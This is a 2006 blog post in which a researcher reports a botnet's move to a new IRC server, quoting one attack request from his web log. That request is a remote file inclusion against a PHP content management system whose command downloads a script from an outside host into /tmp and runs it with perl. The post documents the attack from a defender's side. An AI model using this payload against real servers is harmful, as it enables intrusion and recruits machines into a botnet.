More botnet

Seems the same people that control the botnet I wrote about in my previous post have moved to an other server. I saw this request in a log today:

200.182.50.156 - - [26/Dec/2006:04:03:23 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://sclipici.0catch.com/br/scan.txt;perl%20/tmp/unix ? HTTP/1.0" 200 10922 "-" "Mozilla/5.0"

This request reffers to this http://sclipici.0catch.com/br/scan.txt script. When you open that script you see that the new irc server is now 194.109.20.90, all other stuff like channels and nicknames has stayed the same.

About this entry

You’re currently reading “More botnet,” an entry on Blog

Published:: 26.12.06 / 10h

Tags:: General

No comments

Jump to comment form | comments rss [?] | trackback uri [?]

Have your say

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

About

My name is Bart Vanbrabant, I'm a 24 years old PhD researcher at the department of computer science. I live and work in Leuven, Belgium.

I love my girlfriend, music, food, coding and electronics.

A Résumé is also available here

Links

What I'm Doing...

Leaving for Tuscany. #fb 1 week ago
Only six days to go #fb 1 week ago
Productive morning: compiler is now 2.6 times faster and removed a O(n^2) search. 2 weeks ago
More updates...

Posting tweet...

Powered by Twitter Tools

Recent Posts